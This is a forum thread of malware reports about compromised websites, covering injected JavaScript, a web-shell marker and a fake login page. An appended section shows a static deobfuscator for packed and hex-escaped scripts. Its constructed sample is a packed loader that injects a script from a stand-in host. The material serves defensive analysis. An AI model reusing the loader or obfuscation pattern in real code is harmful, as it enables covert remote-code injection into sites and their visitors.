Avast community forum » Other » Viruses and worms (Moderators: Maxx_original, misak)
Topic: Blacklisted IP - malware on site now closed? (Read 1774 times)
polonus (Avast Überevangelist, malware fighter, Posts: 33891)
Blacklisted IP - malware on site now closed?
on: November 23, 2013, 04:02:45 PM
See:
https://www.virustotal.com/nl/url/c448b0d309c89a52c6c6e4ecddc7c0b151f16a3506b077333c36b9edd79d4e6e/analysis/1385218319/
See recent reports for same IP:
http://urlquery.net/report.php?id=7893395
This scan is clear: Joomla software outdated and JavaScript malware detected:
http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fdiscoverpoznan.info%2F
See:
http://labs.sucuri.net/db/malware/malware-entry-mwjs2368
Users of the Chrome and Firefox browsers are immediately alerted:
https://www.google.com/safebrowsing/diagnostic?site=discoverpoznan.info
Initial malware hoster seems dead now:
http://support.clean-mx.de/clean-mx/viruses.php?domain=ddns.info&sort=first%20desc
Code hiccup:
discoverpoznan dot info/modules/lite/assets/js/2.0.0-b2.js benign
[nothing detected] (script) discoverpoznan dot info/modules/lite/assets/js/2.0.0-b2.js
status: (referer=discoverpoznan dot info/)saved 355 bytes f00b5d1b3d6730dd36c400240e1d9da4bf7bd1f3
info: [decodingLevel=0] found JavaScript
suspicious:
Malware now seems closed:
http://support.clean-mx.de/clean-mx/viruses.php?ip=79.96.83.230&sort=first%20desc
pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Re: Blacklisted IP - malware on site now closed?
Reply #1 on: November 23, 2013, 04:20:58 PM
Another example of such a site: Up(nil): unknown_html RIPE US abuse at main-hosting dot com 31.170.163.240 to 31.170.163.240 ias3.com htxp://dgffugd.ias3.com/
See recent reports on same IP:
http://urlquery.net/report.php?id=7893741
eval(function(p,a,c,k,e,d) JavaScript code:
http://jsunpack.jeek.org/?report=40ef582bb17c4a750ef7be67166ac859b37eb1d9
Listed as suspicious ->
https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fdgffugd.ias3.com&hl=en
Injection check -> Suspicious Text before HTML <!-- saved from url=(0026)htxp://tfiledata.com/rema/ -->
Shell by DarK c0dr hack.
Google Browser Difference:
Not identical
Google: 11205 bytes Firefox: 295 bytes
Diff: 10910 bytes
First difference:
ml><head><meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>googe docs</title> <link rel="stylesheet" type="text/css" href="./remax - secure login_fi...
polonus
polonus
Re: Blacklisted IP - malware on site now closed?
Reply #2 on: November 23, 2013, 06:37:17 PM
About what we saw here:
http://sitecheck.sucuri.net/scanner/
http://labs.sucuri.net/db/malware/malware-entry-mwjs2368
Let us inspect this piece of code:
http://jsunpack.jeek.org/?report=52ced770f769ce5160927c25faa4e8ece3b66861
(view this in a sand-boxed browser with the NoScript and RequestPolicy extensions active)
and to understand the mass infection problem, read:
http://blog.sucuri.net/2011/08/mass-infection-of-wordpress-sites-counter-wordpress-com.html
Link article author = David Dede. Know that this form of Malware Dump has been around since 2011.
We came across a similar issue earlier here:
http://forum.avast.com/index.php?topic=107715.5;wap2
And here we see the hex-decoding:
http://ddecode.com/hexdecoder/?results=5d031ad7b2822f26b88b830110745e61
polonus
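The two decoding steps the thread points at with external tools, the eval(function(p,a,c,k,e,d)...) packer output from the jsunpack report in Reply #1 and the hex-decoding (ddecode) of the injected script in Reply #2, are both mechanical and can be reversed statically, without ever executing the sample. The following is an added example written for this page; it is not code from the thread, from jsunpack, ddecode or Sucuri. The packed sample, the example.invalid host and all function names (encodeIndex, unescapeJsString, parsePacked, unpack, decodeStringLiterals, deobfuscate) are constructed for this illustration. Level 1 rebuilds the packer's dictionary and substitutes the word tokens; level 2 then rewrites \xNN and \uNNNN escapes inside string literals so the hidden hostname becomes readable.

```javascript
// Added example: static unpacker for "eval(function(p,a,c,k,e,d){...})"
// output plus a second pass that decodes \xNN / \uNNNN string escapes.
// Not code from the forum thread, jsunpack, ddecode or Sucuri. Everything
// below (sample input, example.invalid host, function names) is constructed.

// Re-implements the packer's e(): index -> identifier in base `radix`
// (0-9, a-z, then A-Z when the radix is 62).
function encodeIndex(index, radix) {
  const head = index < radix ? '' : encodeIndex(Math.floor(index / radix), radix);
  const digit = index % radix;
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Decodes the escapes found in a JS string literal body: \\ \' \" \n \r \t,
// \xNN and \uNNNN. Any other escaped character is kept as that character.
function unescapeJsString(body) {
  const simple = { n: '\n', r: '\r', t: '\t' };
  return body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g, (_m, esc) => {
    if (esc.length === 3 && esc[0] === 'x') return String.fromCharCode(parseInt(esc.slice(1), 16));
    if (esc.length === 5 && esc[0] === 'u') return String.fromCharCode(parseInt(esc.slice(1), 16));
    return simple[esc] !== undefined ? simple[esc] : esc;
  });
}

// Pulls (p, a, c, k) out of the packer's trailing call
//   }('payload',radix,count,'w|o|r|d|s'.split('|'),0,{}))
// and returns null when the source is not in that shape.
function parsePacked(source) {
  const call = /\}\s*\(\s*'((?:[^'\\]|\\[\s\S])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\[\s\S])*)'\s*\.split\(\s*'\|'\s*\)/;
  const m = call.exec(source);
  if (!m) return null;
  return {
    payload: unescapeJsString(m[1]),
    radix: parseInt(m[2], 10),
    count: parseInt(m[3], 10),
    words: unescapeJsString(m[4]).split('|'),
  };
}

// Level 1: rebuild the plaintext without eval. The packer replaced every word
// with its encoded index, so the dictionary is encodeIndex(i) -> words[i].
function unpack(source) {
  const packed = parsePacked(source);
  if (!packed) throw new Error('not a p,a,c,k,e,d packed script');
  const dict = new Map();
  for (let i = 0; i < packed.count; i++) {
    // An empty slot means the packer left that word in place (it already
    // equals its own encoding), so the token must stay untouched.
    if (packed.words[i]) dict.set(encodeIndex(i, packed.radix), packed.words[i]);
  }
  // One pass over the word tokens gives the same result as the packer's
  // `count` sequential regex passes on genuine packer output.
  return packed.payload.replace(/\b\w+\b/g, tok => (dict.has(tok) ? dict.get(tok) : tok));
}

// Level 2: rewrite \xNN / \uNNNN inside every string literal so hostnames and
// tag names become readable, re-escaping only what must stay escaped for the
// literal to remain valid. Literal-by-literal, no tokenizer: a triage aid.
function decodeStringLiterals(js) {
  return js.replace(/(['"])((?:(?!\1)[^\\]|\\[\s\S])*)\1/g, (_m, quote, body) => {
    const text = unescapeJsString(body)
      .replace(/\\/g, '\\\\')
      .replace(/\n/g, '\\n')
      .replace(/\r/g, '\\r')
      .split(quote).join('\\' + quote);
    return quote + text + quote;
  });
}

function deobfuscate(source) {
  const level1 = unpack(source);
  const level2 = decodeStringLiterals(level1);
  return { level1, level2 };
}

// Constructed sample: a packed script loader whose URL scheme is additionally
// hex-escaped, i.e. two decoding levels as jsunpack would report them.
const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 0=1.3(\'4\');0.5=\'\\d\\6\\6\\e://7.8/9.a\';1.b.c(0);',62,15,'s|document|var|createElement|script|src|x74|example|invalid|x|js|body|appendChild|x68|x70'.split('|'),0,{}))`;

const result = deobfuscate(PACKED_SAMPLE);
console.log('level 1 (unpacked):       ', result.level1);
console.log('level 2 (escapes decoded):', result.level2);
```

Run it with node; the second line printed is the readable loader, with the scheme that was hidden behind \x68\x74\x74\x70 restored to http. Because nothing here evaluates the sample, it is safe to run on a live capture, but the regexes are not a JavaScript parser: a string literal inside a comment or a regex literal is rewritten too, so treat the output as a reading aid and keep the original bytes for the record.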